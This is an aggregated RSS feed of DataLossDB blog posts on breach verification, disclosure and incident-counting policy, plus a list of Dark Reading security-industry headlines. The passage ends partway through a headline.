http://datalossdb.org/incident_highlights.rss As we mentioned in our last post, trying to contact and confirm organizations that have reportedly been breached can be time-consuming and frustrating. When that organization is a hospital and we cannot reach anyone or get a response, it's especially concerning. Yesterday, I tried to contact [Redacted] Hospital. I went to their site for contact info, but they had no phone directory or email directory by department or office. So I called their main number and asked for IT. I was sent to voicemail. I hung up, called back, and asked the operator to stay on the line until I got through to a person in IT or the Privacy Compliance Officer. Eventually, I heard a male voice, who told me that he was the "service desk." The "service desk" was not IT. I subsequently learned that they are an outsourced IT partner. I explained that the hospital had apparently suffered a hack via SQL injection and I could email him a link to the data so that IT could investigate and take action to secure the server better. I gave him my name, email address, and phone number, and told him that I was with the Open Security Foundation. He told me he didn't have an email address for me to email him the link, but that he would open a ticket. He had no email address to give me? Seriously? On the one hand, not accepting an emailed link from a stranger makes good security sense, but on the other hand, how could I send them data and details without an email address? I usually paste some dumped data into the body of the email with the link to the full paste. So now, not only could I not directly reach the responsible parties, I could not even send them any data to pursue. The service desk employee opened a ticket and sent me a copy of it. That was almost 24 hours ago.
The two individuals he directed the ticket to were the hospital's System Administrator and Technical Analyst, neither of whom have contacted me by email or phone, even though my contact details were in the support ticket. In this case, the data were dumped on the Internet at the beginning of December 2012, so maybe they know already, but since the data are still live and in any event, they have no idea what data I called about, maybe they don't know. The data do not appear to be patient data, but they are personally identifiable information. And if those data were vulnerable, what other data might still be vulnerable? Another staff member from OSF also tried to reach them last night - through the hospital's on-site contact form. That form doesn't have a pull-down menu to direct the message to particular subjects or departments. It shouldn't be so difficult to contact the responsible party when there's been a breach. So here are some "best practices" recommendations for HIPAA-covered entities to add to their checklists: 1. Provide a dedicated phone number and email address to report privacy or security breaches and prominently post those contact details on the home page of your web site. 2. Ensure that the phone number and email address are monitored 24/7/365. 3. Establish a written policy that all such contacts or messages are to be acknowledged within 1 hour. 4. Follow up and let the individual who reported the problem know what steps you have taken. 5. If you use a contact form on your web site, have a pull-down menu for subjects, and have one of them be "Privacy or Security Concern." Every hospital tells patients that they take the privacy and security of their information seriously. I wouldn't believe them if they don't respond to security alerts and make people jump through hoops just to try to inform them that they may have had a breach involving personal information. 
And I certainly wouldn't believe any hospital that doesn't even return a phone call when you have left them a message that they may have a security problem with their public-facing server. Responsible hospitals should facilitate reporting privacy or data security concerns. So what has your organization done to facilitate reporting of breaches? /Dissent

==> Fool us once, shame on you. Fool us twice, we implement policies!

http://datalossdb.org/incident_highlights.rss It had all the makings of a sexy data breach story. An individual with the Twitter nick of @TibitXimer claimed to have exploited a vulnerability on Verizon's server and dumped about 300,000 records out of an estimated 3,000,000 customer records allegedly acquired. ZDNet trumpeted the headline, "Exclusive: Hacker nabs 3m Verizon customer records." They reported: "A hacker has posted around 300,000 database entries of Verizon customers to the Web, after exploiting a vulnerability in the cellular giant's network. The hacker, going by the name @TibitXimer on Twitter, told ZDNet earlier this evening that the hack was carried out earlier this year on July 12, which allowed him to gain root access to the server holding the customer data. Tibit gained access to a server with little difficulty after working with another hacker to identify the security flaw." The problem is that although none of it was true, @TibitXimer's claims and ZDNet's repetition of the claims were repeated all over the Internet. One day later, @TibitXimer was gone from Twitter and a more accurate version of the story started to emerge. In statements to other media outlets such as DataBreaches.net, The Next Web, and Forbes, Verizon spokesperson Alberto Canal explained that Verizon's systems had not been breached at all, there was no vulnerability exploited, no root access gained, and that the data dumped were old data from an incident a few months ago. To add insult to the reputation harm that Verizon could have suffered, the incident wasn't even Verizon's incident. It turned out that a third party marketing firm that Canal did not name had accidentally leaked a sales lead list and the list had simply been copied and posted at the beginning of August. Most of the names on the list were not even Verizon customers, according to Canal. The same data were re-posted this week and claimed as a new hack. Not such a sexy story anymore, right?
And ZDNet is certainly not the only media source to believe a hacker's claims that were subsequently determined to be totally untrue. We've been fooled, too, at times, as has Lee Johnstone, who recently had to correct a report on Cyber War News that a hacker named Hannibal had leaked 1,000,000 Facebook account details in retaliation for #OpIsrael. Over the past year, the problem of false claims has reached almost epidemic proportions, which is why, over the past few months, DataLossDB.org started implementing policies requiring us to obtain or at least make a good faith effort to obtain when possible a statement from an allegedly breached entity either confirming, denying, or clarifying and correcting a hacker's claims of a breach - *before* we decide whether to add a report to the database. Sometimes, as in this case, it is relatively easy to reach a media contact and get a response. In other cases, particularly with small entities involved in claimed hacks overseas, it is not so easy, and we may send several e-mails that go unanswered before we try to decide whether to include a claimed breach or not. If you login and read individual entries, you may even see a Curator's Note in the Comments section indicating that we tried and failed to reach anyone by e-mail to confirm the report. Deciding whether to include a report when we cannot reach anyone is headache-inducing, to say the least, as we realize that with this less than perfect system, entities might suffer reputation harm through no fault of their own. We have therefore also implemented the ability to fully delete entries from the database should we later learn that a claim was totally false. Another policy we recently implemented involves putting (DISPUTED) in the summary line for an incident if there is a real dispute as to whether a breach occurred or not.
There may be times when an entity insists they have not been breached but we find the evidence in a data dump to be compelling and decide to include the report. This was the case, for example, in the reported hack of MilitarySingles.com, where they denied it to DataBreaches.net and others, but analysis of the data dump and information still available on their site led us to the decision to include the report. At other times, a reported breach may be part of litigation and where the defendant denies the claims, we may decide to include the report but note it as DISPUTED. Trying to confirm the numerous claimed hacks that appear on Pastebin or other sites on a daily basis is a time-consuming process that slows us down in providing timely reports and has put even more pressure on our resources that are already constrained. However, we believe that it needs to be done to ensure data quality. And so, as 2012 draws to a close, we have already added over 1,400 incidents (and that number does not include the Fringe incidents) for the year, but there are hundreds more still to process. Whatever number you see on the Stats page for December 31st will likely be significantly under our real total for the year until we can catch up. On that note, I wish you all a Happy and Healthy 2013. And let's hope that next year, things slow down for us! /Dissent

==> Is A Data Breach A Life Or Death Situation?

http://datalossdb.org/incident_highlights.rss Most people would agree that security is important; however, many would have a hard time saying that a data breach could be a life or death situation. Sadly, in the past few weeks there have been two cases that may qualify for that characterization in the news. The first case is the data breach at King Edward VII Hospital on December 4, 2012. Two Australian radio show hosts prank called the hospital in a joking attempt to get information on the condition of the Duchess of Cambridge. To their surprise the nurse, who answered the phone, fell for the hoax and provided them with information on the Duchess's condition and care. Last Friday, Jacintha Saldanha, the 46 year old nurse who provided the information, committed suicide just two days after news of the breach was released. The second case involves a data breach that occurred September 28, 2012 at the University of Georgia. A former student gained unauthorized access to a server containing 8,500 former and current employees' names, Social Security numbers, and other sensitive information. Still in the midst of investigation, police announced on Tuesday that Charles Stapler Stell, the 26 year old behind the data breach, passed away with no indication of foul play and most likely the result of suicide. In these two cases, the data breaches and their consequences appeared to have pushed these individuals into a life or death decision. As the importance of privacy and security breaches increases, we have now seen there are potential ramifications to the people involved, more than just notification and credit monitoring. As breaches unfortunately become more commonplace, organizations impacted should ensure that they not only have a response plan for dealing with the incident, but also how to constructively handle any employees at fault. 
While discipline from HR may be on the agenda, organizations need to ensure the wellbeing of their employees as they process their actions. References: http://www.bizjournals.com/atlanta/news/2012/12/11/uga-dead-former-student-responsible.html http://www.telegraph.co.uk/news/9730305/Statement-from-the-King-Edward-VIIs-Hospital-on-the-death-of-nurse-Jacintha-Saldanha.html

==> Behind the scenes of doing the right thing

http://datalossdb.org/incident_highlights.rss From time to time, the Open Security Foundation is contacted about security vulnerabilities and data breaches that have yet to be made public. We always strive to handle each report in the most appropriate way possible and wanted to share with you an example from last year. In March of 2011, we had a breach anonymously submitted to DataLossDB without any further way to contact the submitter, but enough information for us to work on verifying and relaying the issue to the affected company. From the initial look of things, it appeared that job applicants' names, addresses, phone numbers, email addresses, and resumes were accessible and even editable on the Computer Sciences Corp (CSC) website without requiring a login. You could browse to their resume website and increment the ResumeID=x field in the URL making it trivial to enumerate and access approximately 300 applicants' personal information. We contacted CSC as soon as the incident was submitted to see if they would speak to us or at least provide a response. At first it appeared that they ignored our emails and we were getting a bit concerned as several days went by without a response. However, once we escalated to a phone call, we were then able to discuss the issue with the proper contacts and the vulnerability was fixed within 48 hours. We also spoke with their lawyer and they stated that they would notify those affected and get back to us with a statement. Here is the statement from CSC: ---------------------- Original Message ---------------------- Last month, CSC was contacted by Open Security Foundation ("OSF") who had received an anonymous tip that an Internet-accessible Web site CSC had set up for a recruiting effort had security issues.
Upon internal investigation, it was determined that the site created in 2006 was unintentionally architected in such a way as to allow for url manipulation once a person created a profile for themselves, giving them the ability to see other person's resume information. CSC has no evidence that anyone other than the original anonymous tipster and those associated with OSF actually had access to resume information. This site was not properly de-provisioned and remained accessible until 2011 (although the last resume received was in September 2010). The contents, however, were not indexed or searchable by Google. There were approximately 300 profiles created with varying amounts of personal information provided. Although CSC did not ask for or require birth dates or Social Security Numbers, eight people provided either one or both. One person provided the last four digits of a SSN. CSC will provide formal notification as required by state law. In addition, where there is no state requirement, CSC will nonetheless send letters to inform everyone about the vulnerability.
Due to our delay, we have just now pushed this incident live and wanted to thank the anonymous submitter for providing us the information so we could responsibly report it and to CSC for responding to the breach appropriately. To be clear, after we spoke with CSC on the phone and were able to get connected to the right people they responded promptly, did a thorough investigation, and then to our knowledge notified everyone. Our delay in posting this update and pushing the incident live in no way is an indication one way or the other about CSC. In fact, it just highlights the continued challenges for the Open Security Foundation to keep up with the massive amount of breaches that continue to occur every day. In addition, we thought we would post this particular example to share some of the work that happens behind the scenes at OSF, that many people would never know exists. Coordinating with organizations such as this can take a great deal of time and patience on both sides. Whenever possible and practical we do go out of our way to alert entities to breaches, but at other times we unfortunately just have to post the breach. We would love to contact all entities to confirm they are aware of the incident and offer assistance but this is not possible. For example, while we may from time to time, we don't typically contact organizations for breaches when the data is posted publicly such as when information is dumped to Pastebin or other paste sites. Unfortunately, we do not have sufficient staff to always do that and some sites do not make it easy to contact them. We would love to be able to do more with the project, but unfortunately just have not been able to get the support or volunteers required. Moving forward, we will be making changes with the project to help ensure our future. This will begin with a new partnership with Risk Based Security, which will be able to bring more resources to better support the project and continue our research.

==> Sony had HOW many breaches?

http://datalossdb.org/incident_highlights.rss We thought keeping track of entities involved in the Epsilon breach was tough, but the recent spate of attacks on Sony networks has us working overtime trying to update the database. Thankfully, Jericho provided yeoman service and compiled a hyperlinked chronology of recent developments. The Sony breaches have generated a lot of discussion. Some of it has centered on Sony's shocking failure to encrypt passwords and it being all-too-vulnerable to SQLi compromises (if those posting the data publicly are accurate as to how they compromised certain databases). Sony undoubtedly has a lot of explaining to do if it hopes to have future assertions of industry-standard security taken seriously. To date, the two largest incidents affected over 100 million records. But were the PSN and Sony Online Entertainment (SOE) attacks two separate incidents or were they really one breach? Should DataLossDB.org have recorded one breach with over 100 million affected, or two incidents involving 77 million and 24.6 million, respectively? Or should we just treat the last 45 days' incidents as one #EPIC #FAIL and one big incident? In light of our mission to track unique breaches, the question is not trivial. When news of the second incident broke, the first thought was to update the PSN entry and add another 24.6 million to that counter. But as more details emerged, it seemed clear that we should treat it as a separate incident. The attack had occurred on different days than the PSN attack, the data compromised were on different networks, it seems quite likely the different networks had different security measures involved (Sony later testified that databases with credit card data were treated with higher security), we did not know if the same individuals were involved in both attacks, and the company itself was reporting it as a second incident previously unknown to them and not as an update to the other breach. 
Our impression that these were two unique incidents was subsequently supported by the reports made to the New Hampshire Attorney General's Office for each incident (here and here). Despite what we thought was an accurate way to track these breaches, one commenter to DataLossDB.org questioned our decision to treat the reports as two unique incidents. A researcher with Javelin Strategy commented that treating this as two incidents instead of one benefited Sony: they would not appear ranked 2nd in our list of all-time largest breaches on our home page. Since these incidents had the same parent corporation, he suggested, they should be treated as one aggregated incident. While those points may appear reasonable to some, we find them unpersuasive. First, we do not make decisions based on whether an entity benefits or suffers from a particular decision. We make decisions based on whether the available information supports aggregating the data for a particular incident or not. In this case, although it is the same parent corporation, the available information does not support aggregation. In other cases, such as a Wellpoint breach that was initially entered as distinct incidents, when my research revealed that there was only one incident and that what appeared to be a second incident was really due to Wellpoint's vendor not fully securing the web sites after the first report, I recommended that those incidents be combined, and they will be. But other than a common target - Sony - where is there any evidence that this was just one incident? There is none. We recognize that not everyone will agree with our decision, and that's fine. Should new information become available that suggests that a one-incident approach is more appropriate for these incidents, we will edit our entries. As always, we welcome constructive thoughts about how to make the database more useful to stakeholders, but we do not expect all of our decisions to please everyone.

==> Epsilon Bingo

http://datalossdb.org/incident_highlights.rss By now, everyone has probably read about a company named Epsilon. In fact, most people likely have second hand involvement, receiving one or more emails from companies you do business with warning you to be very careful after a recent incident. Most of these companies have used a similar form letter explaining the concerns and that you should be "cautious of phishing e-mails, where the sender tries to trick the recipient into disclosing confidential or personal information." These notifications stem from Epsilon, a managed e-mail broadcasting company, getting compromised and having all of their customer e-mail addresses copied. We have received a few emails from people asking us how we could have missed the Epsilon breach and why it isn't on our site. Well, it actually is on the site as we do follow incidents such as this, however, it is listed as a Fringe incident. Why Fringe? From what we can tell so far, the breach (while unacceptable) is contained to Names and Email Addresses. We do recognize that this information may increase the risk to customers as targeted spearphishing attempts may be more successful, however, there is no loss of PII. We have debated this topic for years and instead of not including them in DataLossDB, they are now just labeled Fringe. There will be more debate on the severity of this incident for sure. Some think it is critical and others merely say that their email address was never meant to be private anyways. There are good arguments supporting both sides of the debate. We will be continuing to add all of the affected organizations as we learn about them, and you can see the incident here: http://datalossdb.org/incidents/3540 When Epsilon posted the notice on their site they mentioned: "On March 30th, an incident was detected where a subset of Epsilon clients' customer data were exposed by an unauthorized entry into Epsilon's email system." 
As of April 4th, they have now updated the definition of subset to mean "The affected clients are approximately 2 percent of total clients and are a subset of clients for which Epsilon provides email services." As of today, we are aware of a little over 40 companies affected and more notices are pouring in from users. As to how many users are impacted, that is anyone's guess. Our guess is A LOT. If you want to read some of the notices we have received, over a dozen are on our mailing list archives: http://lists.osvdb.org/pipermail/dataloss/2011-April/thread.html For those that want to play along, we have decided to make some Epsilon Bingo Cards. If you are able to fill up a whole card and prove it with the notices we might have to give you a prize... that is the least we could do, right? As always, please keep sending us any notices that we are missing so that we may better gauge the scope of this incident and update the cards.

==> The DataLossDB project welcomes Dissent!

http://datalossdb.org/incident_highlights.rss The Open Security Foundation is pleased to announce that Dissent, the publisher and maintainer of DataBreaches.net and PHIprivacy.net, has now joined DataLossDB as a curator for the project. OSF has worked with Dissent over the years and she is already known to us as a DataLoss Archaeologist, as she took third place in our Oldest Incident contest. She found the 1984 TRW incident, where computer hackers gained access to a system holding credit histories of some 90 million people, which happens to be the 3rd largest breach of all time in DataLossDB. Her more active involvement with the project on a day-to-day basis will help us remain the most complete archive of dataloss incidents world-wide and will enhance our ability to keep current on more breaches in a timely manner. Dissent will continue to maintain her own web sites as a resource on breach news and issues. For those who do not know Dissent, she's a practicing health care professional with a special concern for health care sector breaches, and we expect to see increased coverage of medical sector breaches in the database in months to come. As Dissent notes, "With recent changes to federal laws making more information available to us about health care sector breaches, we are now beginning to get some sense of how common these breaches are and the common breach types. Including these incidents in the database will enable analyses that would not have been possible or meaningful just a few years ago." Open Security Foundation's CEO, Jake Kouns, says, "Dissent has been a supporter of DataLossDB from the very beginning and is an extremely dedicated and thorough researcher. We are extremely fortunate to have her as part of the DataLossDB team and look forward to working more closely with her." Welcome Dissent, our newest curator and resident research queen!

==> Open Security Foundation Announces New Advisory Board

http://datalossdb.org/incident_highlights.rss As security vulnerabilities and data loss incidents become a regular occurrence, the Open Security Foundation has grown from supporting a single project in 2004 to a leading provider of filtering through security information and providing notifications and aggregation for data loss and cloud security incidents. The Open Security Foundation has evolved into one of the most utilized resources in providing security information, and as a 501c3 non-profit organization relies heavily on public contributions, volunteer effort and corporate sponsorships. The growing demand for information to provide proper risk management has led to additional projects and now the introduction of an advisory board consisting of industry professionals to lend their expertise in areas to keep OSF moving in a positive direction and to be the first line of access to all that require their service. Open Security Foundation CEO and founder Jake Kouns stated, "This is a very important step in shaping the future of the Open Security Foundation. OSF has reached a point in growth that requires a strategic move to provide longevity and sustainability. It has always been a goal of this organization to provide our work to the broadest audience and the introduction of the advisory board will contribute to that objective." "I am extremely proud to be part of such an amazing organization that has built a reputation of excellence and serves a very important function," adds Kouns. We put out a call for qualified individuals that could provide guidance and insight to keep OSF a leader in the security information arena. The results of our search far exceeded our highest expectations; it not only provides us with confidence in our direction, but the impact OSF has had on the industry. The new advisory board members comprise an array of specific industries that understand the importance of OSF resources. 
Each member was chosen for a specific contribution to ultimately achieve the objective and mission of this foundation and capable of providing broad based perspective on information security, business management and fundraising. Tom Srail, Senior VP Willis Group provides 19 years of experience in the insurance industry with an expertise in risk consulting, professional liabilities, network security risks, intellectual property and technology professional risks. Shawn Andreas, VP Marketing Guard Dog Inc. (GRDO.PK) will contribute his 20 years of experience in marketing and brand awareness to remake OSF to be more consumer and market friendly focusing on fundraising and sponsorship opportunities. His expertise in marketing spans over diverse markets and includes opportunities working with some of the country's top companies including GM, Apple, Viacom and more. Jim Hietala VP, Security for a leading IT standards organization, manages all security and risk management programs. Mr. Hietala is a frequent speaker at industry conferences. In addition he has published numerous articles on information security, risk management and compliance topics. Daniel E. Geer, Jr. Sc.D. Chief Information security officer In-Q-Tel Washington. Mr. Geer has a list of accomplishments including participation in government advisory roles for the Federal Trade Commission, the Departments of Justice and Treasury, the National Academy of Sciences, the National Science Foundation, the US Secret Service, the Department of Homeland Security, and the Commonwealth of Massachusetts. Andrew Lewman, Executive Director The Tor Project, Inc. Andrew Lewman is the Executive Director of The Tor Project, a non-profit organization. Mr. Lewman worked on projects with the National Science Foundation, Internews Network, Freedom House, Google, Broadcasting Board of Governors, National Network to End Domestic Violence, and the US State Department. 
In addition to the advisory board, OSF also announces new leadership positions with the organization. We are pleased to announce that Becky Chickering and Corey Quinn are now curators for the DataLossDB project. We want to thank everyone that contacted OSF to volunteer their time and skills for the advisory board and flexibility as we went through this process. During our conversations with potential members we spoke with several passionate individuals that have a great deal to offer OSF. We plan to continue to expand our leadership team and are always looking for volunteers to help the organization.

==> Open Security Foundation Launches New Cloud Security Project

http://datalossdb.org/incident_highlights.rss The Open Security Foundation, providing independent, accurate, detailed, current, and unbiased security information to professionals around the world, announced today that it has launched Cloutage (cloutage.org) that will bring enhanced visibility and transparency to Cloud security. The name Cloutage comes from a play on two words, Cloud and Outage, that combine to describe what the new website offers: a destination for organizations to learn about cloud security issues as well as a complete list of any problems around the globe among cloud service providers. The new website is aimed at empowering organizations by providing cloud security knowledge and resources so that they may properly assess information security risks related to the cloud. Cloutage documents known and reported incidents with cloud services while also providing a one-stop shop for cloud security news and resources. "When speaking with individuals about the cloud, to this point it has been a very emotional conversation. People either love or hate the cloud," says Jake Kouns, Chairman, Open Security Foundation. "Our goal with Cloutage is to bring grounded data and facts to the conversation so we can have more meaningful discussions about the risks and how to improve cloud security controls." Cloutage captures data about incidents affecting cloud services in several forms including vulnerabilities that affect the confidentiality and integrity of customer data, automatic update failures, data loss, hacks and outages that impact service availability. Data is acquired from verifiable media resources and is also open for community participation based on anonymous user submissions. Cloud solution providers are listed on the website and the community can provide comments and ratings based on their experiences. Cloutage also features an extensive news service, mailing lists and links to organizations focused on the secure advancement of cloud computing. 
"The nebulous world of cloud computing and the security concerns associated with it confuses many people, even IT and security professionals," says Patrick McDonald, a volunteer on the Cloutage project. "We want a clearinghouse of information that provides a clear picture of the cloud security issues."

==> Wontok Introduces SafeCentral For Android At Gartner Security Summit

http://www.darkreading.com/rss/all.xml Company to introduce mobile security solution that protects personal and corporate data on Android devices

==> DigitalPersona Announces U.are.U Software Development Kit (SDK) For Android Applications

http://www.darkreading.com/rss/all.xml DigitalPersona U.are.U SDK for Android uses uniform APIs allowing for easy cross-platform development

==> PortSys Delivers OutSafe Outbound Isolation Capability To SafeRoom

http://www.darkreading.com/rss/all.xml OutSafe acts as "proxy protection" for outbound connections

==> Trend Micro Launches Web App Security Offering Including Advanced Detection And Protection

http://www.darkreading.com/rss/all.xml New security as a service solution offers automated scanning and security testing, automatic application protection, and unlimited SSL certificates

==> Bromium Rolls Out vSentry 2.0

http://www.darkreading.com/rss/all.xml Enhancements in vSentry 2.0 focus on three important requirements for enterprise deployments

==> Visa And Ethoca Collaborate To Help E-Commerce Merchants Reduce Fraud

http://www.darkreading.com/rss/all.xml Service is intended to help merchants reduce fraud losses and associated chargeback costs

==> Black Hat USA 2013 Showcases NAND, Windows 8 Secure Boot Hacking Talks

http://www.darkreading.com/rss/all.xml Organizers confirm another trio of Briefings from the show

==> Tech Insight: What You Need To Know To Be A Cyber Forensics Pro

http://www.darkreading.com/rss/all.xml A look at the skills, experience, and personality traits that make a successful forensics expert

==> Gartner: Worldwide Security Market To Grow 8.7 Percent In 2013

http://www.darkreading.com/rss/all.xml Three main trends shaping the security market moving forward

==> (ISC)2 Launches Certification Program For Cyber Forensics Experts

http://www.darkreading.com/rss/all.xml New Certified Cyber Forensics Professional (CCFP) will help train security pros to handle breaches, testify in court

==> 12 Endpoint Security Myths Dispelled

http://www.darkreading.com/rss/all.xml Mistaken beliefs that hold back endpoint protection

==> LockPath Launches Auditing Tool, Announces New Integrations For Security Manager App & Enhancements To GRC Platform

http://www.darkreading.com/rss/all.xml Audit Manager is an integrated solution designed to help streamline internal audits

==> BT Launches Integrated Solution For Large Scale “Bring Your Own Device” Deployment

http://www.darkreading.com/rss/all.xml BT’s integrated approach is designed to help CIOs deploy smart devices on a large scale

==> Why Database Assessment?

http://www.darkreading.com/rss/all.xml How FIS bungled the basics

==> Digital Defense Issued Patent-Pending Status For Technology

http://www.darkreading.com/rss/all.xml Patent is for scanning technology's host reconciliation process

==> Iris Biometrics Vendor EyeLock Joins FIDO Alliance

http://www.darkreading.com/rss/all.xml EyeLock will collaborate with Alliance members to identify and set a strategy on how to eliminate consumers’ reliance on passwords

==> Agiliance Unveils Mobile Risk Control At Gartner Summit

http://www.darkreading.com/rss/all.xml Service lets IT and security operations teams assess and score mobile application and device risks before they connect to the network

==> Lieberman Announces Automated Security As A Service At Gartner Conference

http://www.darkreading.com/rss/all.xml Upgrades Enterprise Random Password Manager

==> Palo Alto Networks Brings WildFire To The Private Cloud

http://www.darkreading.com/rss/all.xml Palo Alto Networks WF-500 appliance offers sandbox detection and analysis capabilities

==> Former White House Director Of Cybersecurity Joins Damballa Board

http://www.darkreading.com/rss/all.xml Sameer Bhalotra is the chief operating officer of Impermium

==> Veracode Introduces Mobile Application Reputation Service

http://www.darkreading.com/rss/all.xml Cloud-based service provides enterprises detailed and actionable intelligence on risky behavior and malicious code in mobile apps

==> Fortinet Advances Its Network Security Platform With New Enterprise Firewall Capabilitie